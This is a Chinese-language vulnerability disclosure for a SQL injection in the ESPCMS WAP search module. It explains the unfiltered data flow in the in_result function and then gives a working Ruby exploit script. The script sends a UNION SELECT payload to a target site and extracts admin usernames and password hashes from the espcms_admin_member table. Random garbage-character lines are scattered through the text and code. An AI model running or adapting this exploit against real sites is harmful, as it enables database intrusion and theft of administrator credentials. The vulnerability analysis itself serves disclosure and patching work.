espcms wap模块搜索处SQL注入

admin

0×0 漏洞概述0×1 漏洞细节
( C* }' F: V' r& O) r( L0×2 PoC

2 p) j1 E& a2 R/ P+ p2 v' _* F

3 k; L3 y; a9 D& J0×0 漏洞概述

易思ESPCMS企业网站管理系统基于LAMP开发构建的企业网站管理系统，它具有操作简单、功能强大、稳定性好、扩展性及安全性强、二次开发及后期维护方便，可以帮您迅速、轻松地构建起一个强大专业的企业网站。
其在处理传入的参数时考虑不严谨导致SQL注入发生


% A+ U  D5 L* J4 N% S% `0×1 漏洞细节

变量的传递过程是$_SERVER['QUERY_STRING']->$urlcode->$output->$value->$db_where->$sql->mysql_query，整个过程无过滤导致了注入的发生。
正因为变量是从$_SERVER['QUERY_STRING']中去取的，所以正好避开了程序的过滤。
而注入的变量是数组的值，并非数组的key，所以也没过被过滤，综合起来形成了一个比较少见的SQL注入。
* e0 y' F  G: e) D% u: n
在/interface/3gwap_search.php文件的in_result函数中:

/ W7 ]9 R" h2 I; {- |& z$ H
) G- ]- N! [2 m' x! W( v
. u6 ^9 D" @( u2 j) N       function in_result() {
            ... ... ... ... ... ... ... ... ...
            $urlcode = $_SERVER[ 'QUERY_STRING '];
4 ~) A7 h  w* w: F# F4 f            parse_str(html_entity_decode($urlcode), $output);

            ... ... ... ... ... ... ... ... ...
            if (is_array($output['attr' ]) && count($output['attr']) > 0) {

- T2 l0 M+ o- p0 m# G6 n% v                  $db_table = db_prefix . 'model_att';
  Z# C% `9 `& |
' @' i8 L# e/ E2 c( Z                   foreach ($output['attr' ] as $key => $value) {
2 U% Z( a' q4 m0 v0 N                         if ($value) {

: y" J) O* K/ [                              $key = addslashes($key);
+ V7 D- W0 D7 @! Y/ v3 K                              $key = $this-> fun->inputcodetrim($key);
" }: V: g( l6 a- m8 w                              $db_att_where = " WHERE isclass=1 AND attrname='$key'";
* S+ u* \& t5 a: Y2 E: q8 D' [% g                              $countnum = $this->db_numrows($db_table, $db_att_where);
+ i- T; c2 {' A. f; V                               if ($countnum > 0) {
, x3 e) Y' z9 Z3 |: S# ^* P                                    $db_where .= ' AND b.' . $key . '=\'' . $value . '\'' ;
                              }
                        }
. p! x# N' D  e, n! z                  }
' q! ]: @  X$ I, R  [( {8 c            }
# q' v5 O& h- o: p: r0 ?            if (!empty ($keyword) && empty($keyname)) {
                  $keyname = 'title';
4 F/ I# l0 H$ M" j. c( b5 _                  $db_where.= " AND a.title like '%$keyword%'" ;
1 ^9 ~6 H+ i: e/ G            } elseif (!empty ($keyword) && !empty($keyname)) {
8 m& l0 X+ o& H6 o                  $db_where.= " AND $keyname like '% $keyword%'";
            }
            $pagemax = 15;

" d! L  y% f" ~6 T6 i            $pagesylte = 1;

. F- i% f+ }5 Z2 G5 b8 z' ?             if ($countnum > 0) {

6 p4 e: a- }# R! e5 n3 }) h* d                  $numpage = ceil($countnum / $pagemax);
            } else {
                  $numpage = 1;
            }
. {( k* p* M/ R1 z            $sql = "SELECT b.*,a.* FROM " . db_prefix . "document AS a LEFT JOIN " . db_prefix . "document_attr AS b ON a.did=b.did " . $db_where . ' LIMIT 0,' . $pagemax;
            $this-> htmlpage = new PageBotton($sql, $pagemax, $page, $countnum, $numpage, $pagesylte, $this->CON ['file_fileex' ], 5, $this->lng['pagebotton' ], $this->lng['gopageurl'], 0);
8 }3 [3 f4 x$ P& C' q2 q$sql = $this-> htmlpage->PageSQL('a.did' , 'down' );            $rs = $this->db->query($sql);
            ... ... ... ... ... ... ... ... ...
+ [6 H3 e" Y6 t& J      }

5 Q% u; Z9 P) O2 Y
6 f6 k8 D; q9 o1 H0 b0×2 PoC

1 @* Z4 X( H0 R) c$ A
0 I5 m! k0 v! D) ~% O
$ |% g$ e8 [  _; L7 w9 Erequire "net/http"

def request(method, url)
2 A+ [% k) ^$ h: i! O" y2 \2 S    if method.eql?("get")
! b: h' `% Q/ {& f: L# L* i3 ^) {        uri = URI.parse(url)
1 e0 ^5 R0 B& \* E  A5 l. e        http = Net::HTTP.new(uri.host, uri.port)
. I! v( x/ h* w2 j# [; f1 ~& W        response = http.request(Net::HTTP::Get.new(uri.request_uri))
$ e+ Q' \4 G0 O# g        return response
; P9 z* A$ X2 Q: a! v+ {* K! r8 S    end
* e9 z* |  o0 X! ?5 o* e& Uend

doc =<<HERE
* p7 Z) j1 r: t4 c7 E0 |7 C- |" I-------------------------------------------------------
Espcms Injection Exploit
6 ?! d4 n+ E% j4 h/ HAuthor:ztz
3 I( r& R1 [, b+ x- s$ z1 h0 XBlog:http://ztz.fuzzexp.org/
-------------------------------------------------------

HERE

* }% X3 Z1 L$ \4 @- vusage =<<HERE
- _/ m% W, e4 m0 M5 Q* F0 g" wUsage:         ruby #{$0} host port path
example:     ruby #{$0} www.target.com 80 /
. _# A' Q6 G$ C2 L( xHERE

7 N; i# u, g' w3 ]3 rputs doc
if ARGV.length < 3
    puts usage
) o) p* T, S1 m1 ?0 Yelse
9 O6 g' x3 {0 {- {' I# [! V( j( l! r    $host = ARGV[0]
; R+ r* D" b- r+ A& y+ m' Z2 J    $port = ARGV[1]
2 F6 R  {0 F9 o& F, a* I' D5 E    $path = ARGV[2]
3 n  o2 @2 U% S. O! B- |
    puts "

send request..."
& ]* `4 f' }# |3 E  u+ {    url = "http://#{$host}:#{$port}#{$path}wap/index.php?ac=search&at=result&lng=cn&mid=3&tid=11&keyword=1&keyname=a.title&countnum=1&
attr[jobnum]=1%27%20and%201=2%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13
' M, c1 n. Y& F$ Q! I,14,15,16,17,18,19,20,21,22,23,24,25,concat%28username,CHAR%2838%29,password%29,27
,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45%20from%20espcms_admin_member;%23"
    response = request("get", url)
' i2 s; `/ R% z    result = response.body.scan(/\w+&\w{32}/)
5 n4 l- H5 {0 @6 U, G    puts result
end

; h6 ]! t, u' b9 g0 ]